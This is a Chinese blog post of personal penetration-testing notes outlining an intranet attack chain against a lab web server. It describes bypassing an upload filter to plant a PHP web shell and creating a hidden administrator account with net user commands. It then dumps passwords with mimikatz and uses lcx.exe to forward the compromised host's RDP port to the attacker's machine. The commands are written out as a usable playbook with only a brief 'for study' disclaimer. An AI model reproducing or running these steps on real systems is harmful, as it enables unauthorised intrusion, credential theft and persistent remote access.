内网渗透的基本思路

最新推荐文章于 2024-02-19 21:05:09 发布
最新推荐文章于 2024-02-19 21:05:09 发布
阅读量2.8k 收藏 28
点赞数 22
分类专栏: 渗透笔记 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56607768/article/details/120385757
版权

内网渗透的基本思路

1.拿到外网web服务器权限

  • 这里我使用的phpstudy搭建的靶机利用站点upload获取到基本web服务器权限。

  • 进入站点

请添加图片描述

  • 看到第一关,表示只能上传后缀为jpg|png|gif

请添加图片描述

  • 这里我们借助Burpsuite工具将上传包含一句话木马后缀为png文件,后缀改为php,实现绕过。

    一句话木马,后缀为png

请添加图片描述

请添加图片描述

  • 将包放过后出现一个图片形状,右击获取图片的地址。

请添加图片描述

http://192.168.146.137/upload/upload/526.php

  • 通过蚁剑连接后台

请添加图片描述

2.查看自己的权限

  • 蚁剑右击进入虚拟后台

请添加图片描述

  • 终端输入whoami

请添加图片描述

desktop-ggg\system(administrator)最高权限
ssss\network\mysql\apache普通权限

3.设法提权

1.查看systeminfo,重点关注操作系统版本,位数(64/32)补丁编号如果没有kb423377(巴西烤肉漏洞)提权

请添加图片描述

2.ipconfig(查看肉鸡连接了几个网卡,连接几个网络)

3.netstat -ano(查看都有哪些内网主机与本机通信)
netstat -an | findstr "3389"查看端口

请添加图片描述

4.创建用户

net user bb bb@12345 /add #添加用户

请添加图片描述

net localgroup administrators bb /add #将用户添加到管理组

请添加图片描述

net user #查看用户
请添加图片描述

5.窃取administrator的密码

工具 mimitakz
工具用法: 双击mimitakz.exe ,
mimitakz:
privilege::debug
sekurlsa::logonpasswords 如果是密文(用kali软件)

6.利用新账号或administrator登录。登远程桌面(mstsc)

7.向肉鸡上传lcx.exe文件

请添加图片描述

请添加图片描述

8.在黑客机上执行 lcx.exe -listen 44444 55555

请添加图片描述

9.在肉鸡上执行 lcx.exe -slave 黑客 IP 44444 127.0.0.1 3389

请添加图片描述

在靶机上运行lcx.exe注意这个软件上传路径,在终端下要进入这个命令才能运行。

10.在黑客机上打开mstsc 127.0.0.1:55555

请添加图片描述

请添加图片描述

输入刚刚创建的用户名和密码

请添加图片描述

请添加图片描述

登入进去
请添加图片描述

11.nps /neo-reGeorg /ew/这一类的代理工具代理去带来

注:该文章用于自己学习笔记,切勿用于其它用途,否则本人不负责。

你就这样走了吗???

请添加图片描述请添加图片描述
请添加图片描述
请添加图片描述

h1dm
关注
  • 22
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
内网渗透思路整理与工具使用
12-08
内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用
内网渗透系列:内网渗透思路整理
闵行小鱼塘
07-02 7779
整理下内网渗透思路
渗透知识-内网渗透(详细版本)
热门推荐
Jian Sun_的博客
02-11 2万+
1. 内网安全检查/渗透介绍 1.1 攻击思路 有2种思路: 攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者,看情况安装长期后门,实现长期控制和获得敏感数据的方式; 攻击办公网的系统、办公网电脑、办公网无线等方式,一般是采用社工,实现控制办公电脑,再用获得的办公网数据,可能是内网的各种登录账号和密码,再获取办公网或者生产网的有用数据。 一般内网安全检查使用第一种思路,实际的攻击2种思路结合实现。 1.2 敏感资
常见内网渗透思路
weixin_72626108的博客
02-19 891
尽可能去翻一些配置文件,可能会有内网数据库,一些账号密码(ldap,mssql,mysql…)
内网渗透:结合实战个人思路总结
fuqinderen的博客
01-13 2955
内容: 信息收集,提权,代理搭建,域横向移动,哈希传递,票据制作,跨域攻击,上线方式 环境如下: 以钓鱼形式拿下第一台外网服务器,记得设置beacon响应为实时 首先打开一个记事本准备复制粘贴要用到的数据 可以看到我们不是最高权限,第一步肯定是要进行权限提升的,先进行主机信息的收集,查看主机的系统版本,修复的补丁 本电脑为win7 可以看到收集的信息为三级域名,三个补丁 指令: shell systeminfo 其他的先不多想,进行提权,根据版本信息和补丁,ms14_0..
内网渗透思路(图)
qq_45751902的博客
10-24 1228
不要立即进行getsystem,最好绕过UAC。利用powershell工具。
内网渗透技术总结大全.pdf
12-22
内网渗透技术总结大全.pdf
内网渗透之域渗透.pdf
08-07
目录 工作组&域 域的渗透姿势 MS14-068 致谢
内网渗透思维导图.pdf
11-13
一张全方位介绍内网渗透技术及工具的思维导图文档。
agent内网渗透代理相关
最新发布
04-14
内网渗透代理
浅谈内网渗透
若谷的博客
01-16 9184
内网穿透即NAT穿透,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题。通过映射端口,让外网的电脑找到处于内网的电脑。拿到企业或者公司的内网权限,然后从内网得到最有价...
实战 | 手把手教你如何进行内网渗透
jennycisp的博客
06-25 1780
内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一)内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解。
手把手教你如何进行内网渗透
Innocence_0的博客
02-21 680
手把手教你如何进行内网渗透
内网渗透之——常规渗透方式及思路(端口扫描、 弱口令扫描、ms17_010利用、hash注入、远程连接&执行程序......)
wsnbbz的博客
03-25 5686
端口扫描 常见端口以及攻击方式 具体扫描方法点此跳转我的另一文章,里面详细介绍了端口扫描工具的使用 弱口令扫描 弱口令扫描,例如对于mysql,vnc,rdp,http管理登录等弱口令进入的服务,可以使用一些弱口令扫描工具,xscan,hydra,medusa,nmap等。也可以自己找到更多更好的工具 hydra 1.先用nmap扫描开发了哪些端口 2.使用hydra对可以进行弱...
内网渗透笔记
haoge1998的博客
05-06 2306
内网渗透思路 ​ 通过域成员主机,定位出域控制器 IP 及域管理员账号,利用域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性,定位出域管理员登陆过的主机 IP,设法从域成员主机内存中 dump 出域管理员密码,进而拿下域控制器、渗透整个内网。 内网基础知识 1、工作组: 工作组是局域网中的一个概念,他是长久的资源管理模式。默认情况下使用工作组方式进行资源管理,将不同的 computer 按照不同的要求分类到不同的组。 2、域: 用来描述一种架构,和“工作组”相对应,由工作组升级而
【基础向】实战讲解内网渗透思路
anquanzushiye的博客
12-31 523
简介本次测试为实战测试,测试环境是自己搭建的虚拟机中的一部分,敏感信息内容已做打码处理,仅供讨论学习。由于本人在内网方面的掌握也是属于新手阶段,运用到的一些msf攻击手法也很基础,请各位...
内网渗透简单思路
weixin_44110913的博客
10-19 1002
内网渗透简单思路 无域环境 1.nessus或goby扫描 2.尝试ms17010(win7),ms0708(win server),ms0796(win10)等 3.并可以内网嗅探,dns欺骗,内网钓鱼等 有域环境 1.寻找域内管理员,拿到域管理员权限并提权 2.内网渗透,爆hash批处理尝试登陆 3.有时候目标在内网或有防火墙,想实现3389或ssh连接这时候就要尝试搞个端口转发 4.如果内网有防火墙,尝试添加隧道代理或者从网络层应用层面搭建隧道 ...
【渗透技巧】内网渗透思路
11-30 1818
0×01 前言 假如,有一个接入点,可以访问内网服务器网段,如何尽可能的发现服务器网段中可能面临的威胁、存在的安全弱点? ×02 信息收集 首先,对服务器资产信息进行收集,了解哪些ip是存活的,存活的ip开放了哪些端口,以及端口所对应的服务。 推荐工具:F-NAScan github地址:https://github.com/ywolf/F-NAScan 网络资产信息快速收集,结果生...
python内网渗透
10-24
Python内网渗透是指利用Python编写的工具和脚本,通过漏洞利用、端口扫描、密码爆破等方式,获取内网中的敏感信息或者控制内网主机的过程。常用的Python内网渗透工具有reGeorgSocksProxy、ABPTTS等。其中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

h1dm

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值